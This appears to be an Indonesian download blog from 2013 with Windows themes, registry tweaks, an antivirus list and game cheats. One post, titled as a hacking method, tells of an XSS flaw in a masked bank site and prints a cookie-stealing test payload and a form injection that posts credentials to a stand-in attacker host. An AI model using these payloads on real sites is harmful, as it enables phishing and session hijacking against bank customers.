Welcome To My BLOG

INVITE ME WHATSAPP 0852 0707 7076 WECHAT SHIIXIAN FOLLOW TWITTER @SHIXIANZ THANKS

Android

Android

INFINITE CAN YOU SMILE

└ºνє♡ u. (˘⌣˘)

Welcome To My Blog

Hello Guys Welcome to my blog


Senin, 17 Juni 2013

Theme Sir Blue Seven


Selamat datang di haramain software, gudang tempat download software, theme, game, yang keren. di hari senin ini saya akan bagikan theme windows 7 yang keren lagi untuk para sahabat haramain software. Seperti bioasanya haramain software akan bagikan theme untuk windows 7 yang keren untuk sahabat.
Kalau sebelumnya haramain software pernah berbagi theme Sir Red Se7en Visual Style For windows 7, sekarang saya juga akan bagikan saudaranya yaitu Sir Blue Se7en Visual Style for windows 7. Theme yang satu ini juga tidak kalah kerennya dengan theme-theme sebelumnya.
Haramain software juga sedang mencari theme yang sedang di request sama sahabat haramain softwarte. Untuk sahabat haramain software yang request theme windows 7, ditunggu saya akan saya coba carikan theme yang sesuai dengan keinginan sahabat haramain software. Theme ini juga lebih ringan dibandingkan theme saudaranya yang theme sir red se7ene visual style for windows 7.

Screenshot :


Untuk sobat yang ingin mendownload theme sir blue ini, bisa langsung mendownload pada link dibawah ini.


Download Theme Sir Blue Se7en Visual Style ( Mediafire 19 MB )

Tema Tron Legacy Windows 7

Tema Tron Legacy Windows 7

Kembali lagi haramain software berbagi theme untuk semua sahabat. Theme kali ini adalah theme koleksi haramain software yang bisa dibilang super keren .
Theme windows 7 yang super keren ini namanya adalah theme tron legacy. Theme tron legacy ini nanti setelah di install dan membuka personalizenya terbagi menjadi 4 theme yang bisa digunakan yang mana saja sesuai selera.
Di dalam file theme yang saya bagikan ini juga sudah saya sertakan dengan screensavers , Icon pack dan black glassnya yang berfungsi untuk membuat windows menjadi transparant.
Screen Shoot :
Kalau gambar diatas kurang jelas, klik kanan pada gambar kemudian open link in new tab ( buka di tab baru ) untuk melihat ukuran gambar yang lebih besar.
Cara install :
  1. Install terlebih dahulu universal theme patcher jika di PC sobat belum terinstall universal theme patcher kemudian restart. jika sahabat HS belum punya universal theme patcher, silahkan download di sini.
  2. Setelah install universal, extrak file yang di download dan jalankan Tron Legacy.exe untuk menginstall themenya ( klik kanan di desktop, pilih personalize, dan pilih salah satu dari 4 theme hasil install thee Tron legacy ).
  3. Bagi yang ingin menginstall icon packnya, caranya silahkan baca Disini
  4. Untuk cara penggunaan black glass enhanced untuk membuat windows trasparant, didalamnya sudah saya sertakan cara menggunakannya.
  5. SELESAI
Bagi yang ingin mendownload, silahkan download pada link dibawah ini.

Sabtu, 15 Juni 2013

Cara Membuat Tampilan Desktop Menjadi 3D

Cara Membuat Tampilan Desktop Menjadi 3D




Software Real Desktop 2.02 akan membuat desktop tiga-dimensi yang nyata. Perangkat lunak ini menggunakan sumber daya sistem yang sangat sedikit, fitur seperti kemungkinan memilih pada setiap ikon lain, ikon transparan, mengubah ikon dan puts agan inginkan. Juga, ikon pada desktop adalah modus refleksi. software ini akan membuat desktop agan² menjadi lebih menyenangkan dengan fitur 3D dari berbagai fitur yang diberikan.


Software Desktop Fitur yang nyata:
- Dukungan untuk beberapa monitor
- Sembunyikan dan menampilkan nama file
- Menempatkan gambar berbeda pada dinding
- Pengaturan brightness lanjutan
- Berputar ikon dalam arah yang berbeda dan itu kembali normal
- Resize ikon
- Transfer langsung dari file dan folder
- Buat cadangan dari posisi ikon desktop
- Menambahkan grafis rencana
- Menempatkan latar belakang desktop desktop yang 3-D ruang pada dinding
- Kemampuan untuk menyesuaikan backlight dan mode optik, seperti tanggal, objek, waktu
- Dukungan untuk beberapa bahasa di dunia, termasuk bahasa Persia manis
- Berbagai jenis cahaya dan radiasi
- Kemampuan untuk melihat gambar dengan permukaan reflektif
- Suara 3D
- Dukungan Drag & Drop fungsi
- Dengan berbagai tema dan gaya, dan gaya yang berbeda
- Ikon Sampah memiliki beberapa menarik dan menyenangkan


                                          

                                                   Download
                                               Pass : shixian

Jumat, 14 Juni 2013

Tips Mempercepat Kerja Komputer

Tips Mempercepat Kerja Komputer

1. Mencegah Aplikasi Kehilangan Focus Perintah
Tips dan Trick kali ini sangat cocok bagi Anda yang bekerja super cepat dengan kompi / lepi Anda. Trick ini mencegah hilangnya fokus pada aplikasi saat Anda memberikan perintah yang cepat. Terkadang bila kita terlalu cepat memberikan perintah terhadap kompi / lepi kita, bisa jadi aplikasi yang sedang kita pakai mengalami hang atau not responding. Untuk mencegah terjadinya ini silakan ikuti langkah dibawah ini:
  1. Masuk pada registry dengan mengklik menu Start => Run dan ketikkan "Regedit" (untuk win xp) atau klik menu start dan pada pencarian ketikkan "Regedit" (Untuk win7).
  2. Setelah registry muncul, masuk ke alamat berikut ini:HKEY_CURRENT_USER > Control Panel > Destop.
  3. Ubah nilai value ForegroundLockTimeout menjadi 00030d40.
  4. Restart kompi / lepi Anda.
  5. Pengaturan selesai.

2. Mengoptimalkan Hardisk Saat Komputer Dalam Keadaan Idle
Keadaan idle adalah keadaan dimana komputer sedang dalam posisi hidup tapi tidak digunakan. Agar hardisk otomatis dapat bekerja dengan optimal kembali saat kita menggunakannnya lagi dari posisi idle, ikuti langkah berikut ini :
  1. Masuk pada registry dengan mengklik menu Start => Run dan ketikkan "Regedit" (untuk win xp) atau klik menu start dan pada pencarian ketikkan "Regedit" (Untuk win7).
  2. Setelah registry muncul, masuk ke alamat berikut ini:HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows >CurrentVersion > OptimalLayout.
  3. Buat DWORD value baru dan beri nama EnableAutoLayout.
  4. Set value menjadi 1.
  5. Restart kompi / lepi Anda.Pengaturan selesai.

3. Tweaking Memory pada Windows
Kita dapat meningkatkan kinerja Windows dengan memanfaatkan memori. Apabila DisablePagingExecutive diaktifkan, Windows tidak akan melakukan pagisng file ke dalam hardisk. Sistem operasi dan program - program menjadi lebih responsif. Jika LargeSystemCache diaktifkan, sistem akan mengalokasikan seluruh memori (kecuali 4 MB untuk disk caching) untuk file caching. Komputer akan melakukan caching kernel di dalam memory sehingga Windows dapat berjalan lebih cepat.
  1. Masuk pada registry dengan mengklik menu Start => Run dan ketikkan "Regedit" (untuk win xp) atau klik menu start dan pada pencarian ketikkan "Regedit" (Untuk win7).
  2. Setelah registry muncul, masuk ke alamat berikut ini:HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > Session Management > Memory Management.
  3. Ubah value DisanlePagingExecutive menjadi 1.
  4. Ubah value LargeSystemCache menjadi 1.
  5. Restart kompi / lepi Anda.
  6. Pengaturan selesai.

4. Menambah L2 Cache Sesuai Dengan Cache Memory Yang Terinstall
Jika kita sering mengunjungi sebuah website tertentu secara berulang - ulang, lebih baik kita memiliki memory cache yang lebih besar yang digunakan untuk menyimpan data dari website yang telah kita kunjungi. Langkah ini cukup efektif dalam menghemat bandwith agar tidak terbuang percuma. Mari ikuti langkah dibawah ini :
  1. Masuk pada registry dengan mengklik menu Start => Run dan ketikkan "Regedit" (untuk win xp) atau klik menu start dan pada pencarian ketikkan "Regedit" (Untuk win7).
  2. Setelah registry muncul, masuk ke alamat berikut ini:HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > Session Manager > Memory Management.
  3. Ubah nilai value SecondLevelDataCache menjadi 1024. <[Decimal]
  4. Restart kompi / lepi Anda.
  5. Pengaturan selesai.

5. Membuat Desktop Lebih Stabil
Cara untuk membuat desktop kompi / lepi kita menjadi lebih stabil. Berikut langkah - langkahnya:
  1. Masuk pada registry dengan mengklik menu Start => Run dan ketikkan "Regedit" (untuk win xp) atau klik menu start dan pada pencarian ketikkan "Regedit" (Untuk win7).
  2. Setelah registry muncul, masuk ke alamat berikut ini:HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion > Explorer.
  3. Buat DWORD value baru dan beri nama DesktopProcess.
  4. Set value menjadi 1.
  5. Restart kompi / lepi Anda.
  6. Pengaturan selesai.

 

Antivirus terbaik 2013

Antivirus terbaik 2013- virus memang selalu menjadi ancaman serius bagi setiap komputer dan seolah-olah kita hidup di dunia digital yang semakin gelap dan berbahaya yang dipenuhi dengan kejahatan. Apalagi setiap tahun selalu bermunculan virus-virus baru yang semakin canggih saja dan menyebar luas yang dapat mengancam keamanan komputer kita. Banyak virus berkeliaran di dunia maya seperti malware, trojan, worm, spamware dan masih banyak lagi yang sewaktu-waktu dapat masuk dan merusak komputer kita saat menjelajah di internet.
Tetapi untungnya selalu ada pahlawan pemberani yang selalu membantu untuk melindungi kita dari berbagai ancaman tersebut, mereka adalah para perusahaan keamanan komputer (security computer) yang selalu aktif bekerja dan berusaha untuk melindungi setiap komputer di dunia.
Ada banyak perusahaan antivirus yang selalu menciptakan produk berkualitas guna menciptakan keamanan mutu tinggi bagi komputer. Namun dari hasil survey yang dilakukan para peneliti menghasilkan bahwa hanya ada beberapa antivirus yang terpilih menjadi yang terbaik di tahun 2013 ini. Sebut saja perusahaan-perusahaan besar seperti Kapersky, Bitdefender, AVG, Norton dan Trend Micro. Mereka telah berhasil menciptakan produk antivirus terbaiknya dan mengalahkan antivirus-antivirus lain di tahun 2013 ini.
Kelima antivirus ini dikategorikan sebagai yang terbaik karena telah dinilai dari kualitas dan performanya dalam melindungi komputer. Dan saya akan mengurutkan dari yang terbaik dari kelima antivirus tersebut yang saya tampilkan sebagai berikut.
Daftar 5 Antivirus Terbaik 2013 di Dunia
1. BitDefender Antivirus Plus 2013
Dari tahun ke tahun Bitdefender memang selalu menjadi yang terbaik diantara yang terbaik. Di tahun ini Bitdefender mengeluarkan banyak jenis antivirus, dan salah satu produk andalannya yaitu BitDefender Antivirus Plus 2013 berhasil menempati urutan pertama sebagai antivirus terbaik di tahun 2013 ini. Antivirus ini mencapai nilai yang sangat baik dari hasil tes yang dilakukan badan peneliti antivirus ICSA Labs (Laboratorium International Computer Security Association) dan West Coast Labs.
BitDefender Antivirus Plus 2013 ini memang mempunyai kelebihan di atas antivirus yang lain, dia dapat memberikan perlindungan ampuh dari berbagai ancaman seperti virus, malware, spyware, dan pencurian identitas yang bisa terjadi pada komputer kita. Bitdefender juga memberikan perlindungan penuh kepada kita ketika sedang browsing di internet dan kita bisa tetap aman dalam bertransaksi online. Ketika melakukan pengecekan pada sistem komputer, BitDefender Antivirus Plus 2013 akan membutuhkan waktu yang lebih lama dari rata-rata antivirus pada umumnya, itu karena Bitdefender sangat teliti dalam menyaring sistem.
                  Download  BUY
2. AVG Antivirus 2013
AVG menempati urutan kedua sebagai antivirus terbaik. AVG memang sudah sangat terkenal di dunia antivirus, selalu menawarkan perlindungan yang luar biasa dalam menghentikan berbagai serangan virus bahkan sebelum anda menyentuh komputer anda. Selain itu AVG juga memeriksa data file anda, link dan email sebelum anda membukanya, juga mencegah segala sesuatu yang dapat memata-matai dan pencurian data pribadi anda.
AVG dikenal memiliki antivirus gratisan yang sangat baik, dan hampir sebaik produk komersial lainya. Jadi jika kita mengharapkan produk komersial yang lebih baik, AVG menawarakan produk komersialnya sendiri yaitu AVG Antivirus 2013. AVG Antivirus 2013 ini juga menyediakan perlindungan gratis untuk Handphone, Smartphone dan perangkat lainnya seperti Tablet.
AVG Antivirus 2013 memiliki skor tinggi dari hasil tes yang dilakukan di Lab. badan peneliti antivirus. AVG mempunyai filter terbaik dari setiap antivirus yang ada tahun ini. Salah satunya firewall sederhana sebagai perisai online yang berguna untuk mem-blok situs-situs berbahaya. Jadi, AVG sudah melakukan pemindaian terhadap situs-situs tersebut sebelum anda membukanya.
3. Kaspersky Antivirus 2013
Kaspersky telah mengeluarkan produk terbarunya tahun ini yaitu Kaspersky Antivirus 2013 yang berhasil menempati urutan ke-tiga dari daftar TOP 5 Antivirus Terbaik 2013 di Dunia. Kaspersky Antivirus 2013 memiliki fitur yang telah dilengkapi dan diperbaharui yang tentunya lebih baik dari versi-versi sebelumnya. Kaspersky juga memberikan pilihan update dari versi home sampai coorporate tergantung dari kebutuhan anda. Selain itu, penggunaanya juga sangat friendly dan cocok untuk pemula atau yang belum pernah menggunakannya karena Kaspersky juga memberikan tutorial tentang penggunaan antivirus ini.
Antivirus ini mampu mengenali dan mendeteksi virus-virus berbahaya yang sulit dimusnahkan. Ketika kita sedang browsing di internet, kadang kita tidak menyadari bahwa virus sudah masuk ke dalam sistem komputer kita dan menginfeksi file-file dan data penting. Namun dengan Kaspersky hal itu bisa diatasi dengan cepat. Security systemnya akan langsung mendeteksi dan mengeksekusi kemudian menetralisir file tersebut untuk dibersihkan. Kaspersky Antivirus 2013 ini memiliki kesensitivitas yang cukup tinggi sehingga jika ia menemukan file atau perangkat lunak yang tingkah lakunya mencurigakan maka Kaspersky akan langsung memberikan tindakan berarti dalam menanganinya.
4. Trend Micro Titanium Antivirus Plus 2013
Pada urutan ke-empat ditempati oleh Trend Micro Titanium Antivirus Plus 2013. Antivirus juga memiliki tampilan yang user-friendly, cocok untuk pengguna yang belum berpengalaman. Titanium Antivirus 2013 ini juga mendapat nilai rata-rata yang cukup tinggi di laboratorium penelitian antivirus.
Antivirus ini sangat baik dalam memblokir serangan malware yang melebihi rata-rata antivirus lain yang dapat menghapus malware. Software ini memiliki keakuratan yang tinggi namun lambat, dapat menyaring spam, firewall serta fitur yang cukup keren dalam melindungi privasi facebook anda.
5. Norton Antivirus 2013
Di urutan terakhir dari daftar TOP 5 Antivirus Terbaik 2013 di Dunia ditempati oleh Norton Antivirus 2013, salah satu produk keluaran perusahaan kemanan komputer Symantec. Test pengujian yang dilakukan di AV Test Labs di Jerman menunjukan hasil Norton Anti Virus mampu mendisinfeksi computer yang sudah terinfeksi dan kemudahan dalam hal penggunaan serta kemampuan menangkal serangan malware.
Antivirus Norton ini efektif untuk melindungi computer dari berbagai serangan virus, worms, bots dan spyware. Selain itu juga Norton Anti Virus mudah diinstal dan dioperasikan, proses scannya berjalan dengan cepat. Anda akan mendapatkan support setiap hari dan setiap jam jika membeli produk ini. Norton AntiVirus mendeteksi malware yang didasarkan pada perilaku file yang dicurigai. Melindungi Firefox dan Internet Explorer dari malware yang mencoba untuk mengeksploitasi kerentanan browser. Jika Anda menonton video atau bermain game pada komputer Anda, Norton secara otomatis tidak menjalankan scan sistem. Dukungan pihak ketiga dari tes objektif labs mengkonfirmasi bahwa Norton unggul mencegah serangan malware dan mengeluarkan computer dari ancaman file yang sudah terinfeksi.

Selain melindungi PC terhadap spyware dan virus, Norton AntiVirus juga memindai pesan instan dan email untuk memeriksa lampiran yang terinfeksi, link yang mencurigakan dan virus. Juga memindai newsfeed Facebook Anda untuk menemukan link ke situs-situs yang tidak aman atau berbahaya untuk download.
Itulah informasi mengenai TOP 5 Antivirus Terbaik 2013 di Dunia yang semoga bisa bermanfaat untuk anda. Kelima antivirus diatas juga sekaligus sebagai rekomendasi dari saya untuk anda dan anda boleh memilih salah satu antivirus diantaranya untuk melindungi komputer dari bebagai ancaman virus berbahaya yang dapat masuk dan merusak sistem komputer anda. Dan perlu diketahui bahwa data dari kelima antivirus di atas memang terpilih menjadi yang terbaik, diperoleh dari hasil tes yang dilakukan oleh laboratorium independen milik badan-badan peneliti antivirus di dunia.

 Kita pasti sudah bosen tampilan monitor yang cuma iti-itu saja, tenang ini adalah solusinya dengan memakai aplikasi rainmeter kita bisa membuat tampilan monitor kita lebih hidup.




CARA  MENGINSTAL :
1. Setelah di download ekstrak dulu, dengan  mengeklik kanan file yang didownload lalu pilih ekstrak here.
2. setelah di ekstrak pilih file rain meter 3.2 yang berbentuk rar, lalu klik aplikasi rainmeter untuk memulai      instal.
3.Pilih instalasi standar, dan klik lanjut untuk melanjutkan instalasi
4.Pilih lokasi kamu untuk menaruh file rainmeter, lalu klik instal



 5.Setelah selesai tutup jangan lupa pilih jalankan rainmeter.
     

                                                                ~Download~

CARA AMPUH HACK WEBSITE DENGAN XSS

CARA AMPUH HACK WEBSITE DENGAN XSS

Jim Ley menemukan adanya permasalahan XSS pada situs Google dan ia memutuskan untuk melaporkannya kepada Google. Lebih dari dua tahun lamanya, ternyata laporan dari Jim Ley tidak digubris sama sekali sehingga akhirnya pada bulan oktober 2004 ia memutuskan untuk mempublikasikan kepada publik.

Kelemahan XSS yang terjadi pada situs Google ini memungkinkan dilakukannyaVirtual Defacement dimana halaman google akan diganti dengan halaman palsu yang dibuat oleh hacker.

 Jim Ley membuat halaman input informasi kartu kredit yang seakan-akan dilakukan oleh google, padahal bukan. Pada URL google, Jim Ley menambahkan kode :
L:javascript:javascript:document.appendChild(document.createElement('script')).src='http://jibbering.com/test.js

Kode ini akan membuat script yang berada pada situs lain yaitu jibbering.com/test.js akan dijalankan seakan-akan berasal dari google (http://jibbering.com/2004/10/google.html)

Tidak Hanya Google

Google bukanlah satu-satunya korban dari serangan XSS.

SunTrust Bank, Mastercard, National Westminster dan Wordplay adalah 'klien besar' yang terkekna serangan XSS dan Greenhalgh mempublikasikan tehnik yang digunakan dalam menginjeksi javascript terhadap situs bank yang seharusnya nomor satu dalam hal pengamanan. Kasus-kasus XSS masih terus berlangsung bahkan sampai detik ini dan OWASP ( Open Web Application Security Project ), sebuah organisasi yang mengusulkan diri pada keamanan aplikasi, mengkategorikan XSS sebagai permasalahan utama aplikasi web saat ini.
Situs Bank Lokal Menjadi Korban

Kejadian yang hampir serupa dengan yang dialami oleh Greenhalgh juga saya rasakan. Ceritanya pada saya hendak menggunakan transaksi internet banking (ya, saya adalah pengguna setia layanan ini) dan salah memasukan password. Aplikasi Internet banking menampilkan sebuah pesan/warning tentang kesalahan yang saya lakukan " User ID harus Alpha Numerik/User ID must be Alpha Numeric ".

Yang menarik perhatian saya adalah pesan yang ditampilkan ini, ternyata juga muncul di bagian URL! " https://ibank.*****.com/authentication.do?value(actions)=logout&value(strError)=User ID harus Alpha Numerik/User ID must be Alpha Numeric ".

Suatu teknik yang biasa digunakan oleh programmer untuk mengirimkan parameter kepada sebuah fungsi dan sebuah teknik yang biasanya bermasalah dalam hal kelemahan injeksi script atau kelemahan XSS!

Kejadian ini terjadi lebih dari 2 tahun yang lalu atau tepatnya pada bulan april 2007 dan telah saya laporkan kepada pihak bank melalui SMS ( 081811**** ) yang di jawab akan dilakukan investigasi.

Sampai tulisan ini saya buat kembali, ternyata permasalahan ini sama sekali tidak diperbaiki, mungkin karena dianggap bukan sebagai suatu kelemahan dan bukan sesuatu yang berbahaya.

Benarkah demikian? Saya akan memperlihatkan kepada Anda apa yang bisa saya lakukan akibat dari kesalahan semacam ini dan silahkan Anda nilai sendiri.
Teknik Mencari Kelemahan XSS

Untuk melihat kemungkinan serangan XSS, saya melihat source code yang dihasilkan pada saat warning aplikasi ini ditampilkan. Pada baris 230, terlihat kalimat yang ditampilkan berada didalam sebuah variable yaitu " err " dan variable ini berada didalam blok kode <script>.
  1.  Untuk membuktikan adanya kelemahan XSS, saya mencoba memasukkan java script standard yang akan menampilkan cookie dengan memodifikasi URL-nya menjadi :
    https://ibank.*****.com/authentication.do?value(actions)=logout&value(strError)=';alert(document.cookie);</script>

    Dengan merubah URL ini, kini bila dilihat melalui source code halaman yang menampilkan pesan akan berubah menjadi :
    <script>
    var err='';allert(document.cookie);</script>
    alert(err);
    iBankForm.action='login.jsp';
    iBankForm.submit();
    </script>

Harapan saya sebenarnya aksi ini akan gagal karena mengharapkan adanya proteksi tambahan seperti pemblokiran terhadap karakter khusus atau penghapusan kata<script> yang umum dilakukan, ternyata dugaan saya keliru. Tidak ada proteksi sama sekali terhadap potensi XSS ini dan aksi ini berhasil dengan baik yang dibuktikan dengan menampilkan cookie yang berjalan dengan lancar.

Percobaan ini membuktikan bahwa pencurian cookie memungkinkan untuk terjadi sehingga memungkinkan adanya serangan session hijacking atau pengambil alihan suatu koneksi oleh hacker. Ada beberapa hal yang cukup menarik untuk diperhatikan dalam kasus ini.

Pertama, penggunaan https atau sebuah koneksi yang secure ternyata tidak berguna dalam kasus ini. Kedua, penggunaan sertifikat yang biasanya dikatakan sebagai jaminan keamanan ternyata juga tidak berguna bahkan bisa dikatakan menjebak. Saya akan menunjukan betapa tidak bergunanya sertifikat ini pada percobaan sederhana berikutnya.
Virtual Defacement

Selanjutnya, saya mencoba membuktikan serangan yang lebih serius yaitu dengan melakukan virtual defacement atau perubahan halaman secara virtual. Dikatakan sebagai virtual karena saya tidak benar-benar merubah tampilan halaman web bank tersebut namun hanya merubahnya secara virtual melalui injeksi perintah.

Kenapa berbahaya? Karena saya akan menambahkan sebuah input box baru yang seakan-akan disediakan oleh situs bank dan yang lebih berbahaya adalah ketika pengguna mengisi text box yang telah disediakan dan menekan tombol submit. Hasil inputan ini akan dikirimkan ke alamat hacker atau alamat yang telah saya tentukan, bukan ke alamat bank, padahal sertifikat situs tersebut masih asli lho !

Untuk menambahkan form text box dan tombol submit, saya tidak perlu menggunakan java script, cukup dengan tag HTML. URL yang telah dimodifikasi, akan terlihat sebagai berikut :

https://ibank.*****.com/authentication.do?value(actions)=logout&value(strError)=';</script><form method="post" action="http//www.hacker.com/simpan.aspx"><p>User ID<input type="text" name"T1"><input type="Submit" value="Submit" name="B1></p></form><!--

Modifikasi URL akan membuat source code halaman login situs bank berubah menjadi :

<script> var err='';</script><form method="post" action="http//www.*******.com/a.aspx"><p>User ID<input type="text" name"T1"><input type="Submit" value="Submit" name="B1></p></form><!--' alert(err);iBankForm.action='login.jsp'; iBankForm.submit(); </script> </body> </html><script>

 Setelah memasukkan URL yang telah dimodifikasi, terlihat sebuah text box berada di bawah halaman utama bank ! Apa artinya ini ? Virtual Defacement telah berhasil dilakukan! Teknik mendeface tanpa merusak dan merubah file yang ada didalam web server!

 

Kemungkinan Aksi Lanjutan

Saya sudah menunjukkan kepada Anda bagaimana mengambil cookie dengan java script dan bagaimana melakukan virtual defacement dengan menambahkan sebuah text box yang baru. Teknik Virtual Defacement ini cukup menarik karena bisa dilakukan walaupun situs menggunakan HTTPS dan ada yang lebih menarik lagi.

Biasanya, Anda selalu diwanti oleh pihak agar mengecek keabsahan sertifikat ( dalam contoh ini adalah cybertrust ) yang digunakan untuk memastikan keaslian situs yang digunakan. Pada kasus ini sertifikat yang Anda lihat adalah asli dan sah namun ketika Anda memasukkan data kedalam text box dan mengklik tombol submit, informasi Anda akan dikirimkan kepada hacker! Kaget ? Teknik ini bisa dikombinasikan dengan teknik penipuan/social engineering seperti dengan mengirimkan email kepada korban dan menginformasikan kepadanya tentang undian berhadiah atau memintanya mengganti password melalui form palsu yang telah disediakan oleh Hacker. Saya yakin, banyak sekali yang ahli dalam hal Social Engineering dan tidak perlu lagi saya berikan contoh-contoh lainnya. Kini, apakah menurut Anda serangan XSS berbahaya atau tidak? Siapa yang harus bertanggung jawab seandainya terjadi korban dalam kasus semacam ini?

Serangan XSS yang saya tunjukkan pada artikel ini, masih sangat sederhana dan tidak melakukan deface pada halaman secara total seperti yang pernah ditunjukkan olehJim Ley dan Greenhalgh namun bukan berarti tidak mungkin untuk dilakukan.

Dengan menginjeksi javascript, bahkan bisa dibuat fungsi keylogger, scanning network, pencurian password lokal dan lain sebagainya. Jadi, akibat dari permasalahan XSS ini jelas sangat serius bila di eksploitasi oleh orang yang tepat.

Sekedar info :
" XSS merupakan singkatan dari Cross Site Scripting memang tampak sedikit aneh. Singkatan dari Cross Site Scripting seharusnya CSS namun singkatan ini ternyata memberikan masalah bagi pengguna CSS telah digunakan oleh Cascading Style Sheets, suatu bahasa yang digunakan untuk mengatur tampilan halaman suatu dokumen web. CSS sendiri sangat populer karena menawarkan fleksibilitas pengaturan tampilan dan akibatnya tentu saja, akan membingungkan pengguna apabila terdapat dua singkatan yang sama untuk menandakan dua hal yang berbeda sama sekali. Akhirnya, Cross Site Scripting harus mengalah dan menggunakan singkatan XSS "

Cara Merubah Tampilan Windows 7 Menjadi Apple Mac OS X Lion 2014

Cara Merubah Tampilan Windows 7 Menjadi Apple Mac OS X Lion [Transformation Pack]



Buat agan-agan yang ingin menggunakan Mac OS X Lion tapi cuma punya modal Windows 7, silakan coba Mac OS X Lion Transform Pack Windows 7. Caranya gampang kok, tinggal download, buka filenya, trus klik next next aja... ;D
 Langsung jadi deh, ni previewnya, keren kan?
                                                                     Download 

                               nanti kyk gini sob..



Kamis, 13 Juni 2013

Software Penghemat Baterai Laptop

Software Penghemat Baterai Laptop




Baterai Laptop anda cepet Habis?? Dan apakah anda pengen baterai Laptop anda tahan Super Lama?? Ini dia Solusinya. Kali ini kami akan bagi-bagi sebuah software yang dijamin akan membuat Baterai anda tahan super lama.

Double Battery merupakan software kecil tapi mampu menghemat baterai 2 kali lipat dan mempersingkat waktu charging. Meskipun software ini kecil namun bisa mendatangkan manfaat buat anda yang mempunyai kendala dengan listrik misalnya lampu mati.

Double Battrey ini mempunyai fungsi Turbo Charging, biasanya chargingnya nunggunya lama sekarang juga dipersingkat untuk memuaskan anda.

Software ini sangat mudah digunakan dan simpel, software ini sangat berguna untuk dunia karena anda juga ikut serta menjaga dunia agar tetap hijau dan anda juga mengurangi tagihan biaya listrik anda. Software ini wajib anda coba.

Oke, penggunannya sangat mudah yang pertama download dulu softwarenya kemudian exctract dan install. Untuk menjadikannya Pro pilih Unlock Baterai Doubler
 NB : Harus Connect Internet
Isi dengan nama anda dan isi unlock codenya yang sudah disediakan di softwarenya

Jika ingin mengetahui softwarenya berfungsi atau berjalan anda bisa lihat di Taskbar klik 2x pada gambar yang telah di tandai
                                               Jika tulisannya Enabled berarti berjalan softwarenya berjalan       
Selain itu ada fungsi untuk menghemat listrik jadi kalau charging sebentar langsung full. Caranya pilih Main Menu > pilih Main > Enable Turbo Charge, anda Yes.

Jika anda ingin cara kerjanya maksimum pilih Autonomy > Pilih Maximum Autonomy


                             Download
                                                                   
                     PASS : SHIXAN


70 Gadget Mantap Untuk Windows 7

70 Gadget Mantap Untuk Windows 7



Saya yakin, pasti semua pengguna Windows Seven pasti tau apa itu Gadget yang biasanya ada di desktop dan fungsinya. Yap…Gadgets merupakan hiasan yang biasanya ada di destop Win 7 anda.

Nah….jika biasanya Gadgets yang ada di desktop anda cuman itu-itu saja, maka kali ini saya akan bagi-bagi Gadgets untuk Windows 7 yang Super Mantap.

  • Cara penggunaannya gampang koq. Pertama-tama silakan anda Download pada Link yang sudah tersedia di bawah kemudian silakan anda > extract filenya > kemudian klik 2x pada salah satu gadgets yang anda pilih misalnya “Twenty Four Clock” > klik Install.
  • Lihat Gadgets “Twenty Four Clock” dengan klik kanan pada desktop pilih Gadgets
  • Cara menggunakannya tinggal klik kanan > pilih Add 





kyk ni contohnya sobat..



Deep Freeze 7 - Semakin Banyak Fitur & Susah Dijebol

Deep Freeze 7 - Semakin Banyak Fitur & Susah Dijebol






Beberapa waktu yang lalu saya sudah pernah memposting tentang Deep Freeze 6 yang bisa berjalan di Operating System Windows 7. Kali ini, saya akan memposting lagi Deep Freeze versi terbaru yaitu Deep Freeze 7.0 dan tentunya pada versi kali ini terdapat banyak sekali fitur baru dan mantab yang wajib anda gunakan.

Pada Deep Freeze versi sebelumnya telah banyak ditemukan cara untuk membobolnya, dan mudaah-mudahan pada versi 7 kali ini masih sulit yah….untuk dibobol.

Berikut ini fitur-fitur yang disajikan Deep Freeze 7 :

Absolute Protection
  • Jaminan 100% workstation recovery on restart
  • Memberikan proteksi password dan keamanan lengkap
  • Melindungi beberapa hard drive dan partisi

Integrasi dan Kompatibilitas
  • Supports multi-boot lingkungan
  • Compatible with Fast User Switching
  • Supports SCSI, ATA, SATA, dan IDE hard drive
  • Single menginstal untuk Windows 95, 98, ME, 2000, XP dan Vista
  • Supports FAT, FAT32, NTFS, dasar dan dinamis disk, dll




Peach Emoticon v.6094 SXZ

                       


                                                            DownLoad    

Hidden Song V 6094


                                                                   Download 

Rabu, 12 Juni 2013

Cheat Ayodance V 6094 PF ON OFF



                                                                 DownLoad  

Jumat, 07 Juni 2013

Cheat Ayodance Hidden Song V6093

Hidden Song V6093
                                                 Cheat Ayodance Hiddensong By: Arif
                               » » » » » » » »      ☺¹♠Download☺¹♠»